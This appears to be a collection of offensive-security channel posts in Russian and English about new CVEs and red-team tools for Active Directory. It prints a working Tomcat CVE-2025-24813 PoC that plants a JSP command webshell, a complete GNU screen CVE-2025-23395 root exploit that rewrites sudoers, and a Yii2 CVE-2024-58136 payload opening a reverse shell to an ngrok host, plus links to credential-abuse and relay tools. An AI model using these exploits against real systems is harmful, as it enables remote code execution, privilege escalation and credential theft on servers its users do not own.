🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:

curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
  -H "Content-Type: application/x-jsp" \
  --data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i

📥 Доступ к вебшеллу:

curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i

📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.

😈 [ Alex Neff @al3x_n3ff ]

NetExec v1.4.0 has been released! 🎉

There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system

And much more!
Full rundown:

🔗 https://github.com/Pennyw0rth/NetExec/releases/tag/v1.4.0

🐥 [ tweet ]

NTLM релей в WinRMS, не ждали? А вот...

Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./

Soft: https://github.com/fortra/impacket/pull/1947

#pentest #redteam #relay #ad #lateralmovement

Часто же бывает такое, что необходимо найти машины, на которых работают определенные пользователи. Скрипт показывает сессии на всех хостах, которые дернет из LDAP.

https://github.com/p0dalirius/FindUnusualSessions

#pentest #redteam #ad #enum

CVE-2025-21204: LPE in Windows Update Stack

A local privilege escalation flaw in the Windows Update Stack. By abusing directory junctions or symbolic links, attackers can hijack trusted paths accessed by SYSTEM-level processes like MoUsoCoreWorker.exe and execute arbitrary code with elevated privileges.

Blog: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/

Coverage (Покрытие).
Начну с базы, даже с двух:
1. В 95% случаев получить права админа домена не сложно, и чаще всего это занимает не более 2 часов;
2. Большинство заказчиков хочет не просто пентест, а ПОКРЫТИЕ (т.е. что бы нашли и описали как можно больше уязвимостей и векторов).
И вот у каждого из нас наступает день, когда у заказчика 4 разных домена, куча разных целей и уязвимостей в смежных системах. Сделать хорошее покрытие нет ни сил ,ни времени, ни желания... Лично я в любом случае всегда собираю для каждого домена ldapdomaindump, secretsdump NTDS.DIT (если заказчик согласовал, без разрешения так делать не стоит), и в принципе этих данных достаточно что бы найти множество багов после проекта, на этапе подготовки отчета:
1. Kerberoasting;
2. As-Rep Roasting;
3. Проверить есть ли пароли в дескрипшинах у пользователей;
4. Подсветить опасные реюзы паролей у привилегированных пользователей;
5. Чекнуть возможность проведения атаки Pre2k (это неплохой вектор начального доступа, но когда права админа домена в кармане, не хочется проверять такие базовые, но опасные уязвимости)
6. Включенное обратимое шифрование в базе NTDS.DIT;
7. Неограниченное делегирование;
8. Слабые пароли и сколько их в домене
и много-много других...
Специально для решения этой задачи я написал небольшой скрипт на Python, который распарсит ldd, dump и brute и сделает удовлетворительное покрытие. На выходе мы получаем отчет в формате MarkDown. Каждая уязвимость описывается отдельно в папке modules по следующему правилу. Вы можете легко дописать множество своих проверок или удобно поменять текущие. Пример отчета прикладываю к посту.

😈 [ Alex Neff @al3x_n3ff ]

A new module has been merged into NetExec: change-password🔥

Accounts with STATUS_PASSWORD_EXPIRED aren't a problem anymore, just reset their password.
You can also abuse ForceChangePassword to reset another user's password.

Made by @kriyosthearcane, @mehmetcanterman and me.

🐥 [ tweet ]

вьетнамские флешбеки 5летней давности - https://snovvcra.sh/2020/10/31/pretending-to-be-smbpasswd-with-impacket.html

EvilentCoerce

A PoC tool that triggers the ElfrOpenBELW procedure in the MS-EVEN RPC interface (used for Windows Event Log service), causing the target machine to connect to an attacker-controlled SMB share. If antivirus software (e.g., Defender) is present, it may scan the file and unintentionally leak NetNTLMv2 credentials, which can be relayed via ntlmrelayx.

Blog: https://habr.com/ru/companies/tomhunter/articles/907068/

Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...

#redteam #pentest #ad #adcs

CVE-2025-23395 Screen LPE exploit

#!/bin/sh

F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
        echo "[+] bl1ng bl1ng, we got it"
        sudo sh
else
        echo "[-] exploit failed :("
fi
rm -rf $F $L

Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395

😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]

😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]

CVE-2024–58136 — RCE PoC
*
Yii2 Framework

curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

dMSASync.py

P.S. I hope the last one (by @snovvcrash)